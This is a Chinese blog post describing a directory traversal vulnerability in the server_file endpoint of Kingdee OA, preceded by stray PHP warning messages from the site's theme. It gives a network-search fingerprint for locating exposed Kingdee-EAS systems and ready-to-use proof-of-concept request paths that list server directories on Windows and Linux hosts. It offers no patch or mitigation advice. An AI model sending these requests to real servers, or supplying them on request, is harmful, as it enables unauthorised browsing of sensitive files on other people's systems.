Warning: Undefined array key "HTTP_ACCEPT_LANGUAGE" in /www/wwwroot/blog.guapiwo.top/usr/themes/joe/public/tencent_protect.php on line 40

Deprecated: strpos(): Passing null to parameter #1 ($haystack) of type string is deprecated in /www/wwwroot/blog.guapiwo.top/usr/themes/joe/public/tencent_protect.php on line 40
金蝶OA server_file 目录遍历漏洞 - 瓜皮博客_d0glun

金蝶OA server_file 目录遍历漏洞

d0glun

累计撰写 25 篇文章
累计收到 2 条评论

金蝶OA server_file 目录遍历漏洞

瓜皮博客_d0glun

首页
/
默认分类
/
正文

默认分类

金蝶OA server_file 目录遍历漏洞

d0glun

2025-05-20 / 1 评论 / 12 阅读 / 正在检测是否收录...

05/20

漏洞描述
金蝶OA server_file 存在目录遍历漏洞，攻击者通过目录遍历可以获取服务器敏感信息
漏洞影响
1
金蝶OA
网络测绘

app="Kingdee-EAS"

漏洞复现
登录界面为

漏洞Poc

/appmonitor/protected/selector/server_file/files?folder=/&suffix=

# Windows服务器
appmonitor/protected/selector/server_file/files?folder=C://&suffix=

# Linux服务器
appmonitor/protected/selector/server_file/files?folder=/&suffix=

暂无标签

收藏本站，优质文章不错过

blog.guapiwo.top

版权属于： d0glun

本文链接： https://blog.guapiwo.top/index.php/archives/13/

作品采用：《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0) 》许可协议授权

6666
Android · Google Chrome

6666

2025-05-20 回复

金蝶OA server_file 目录遍历漏洞

评论 (1)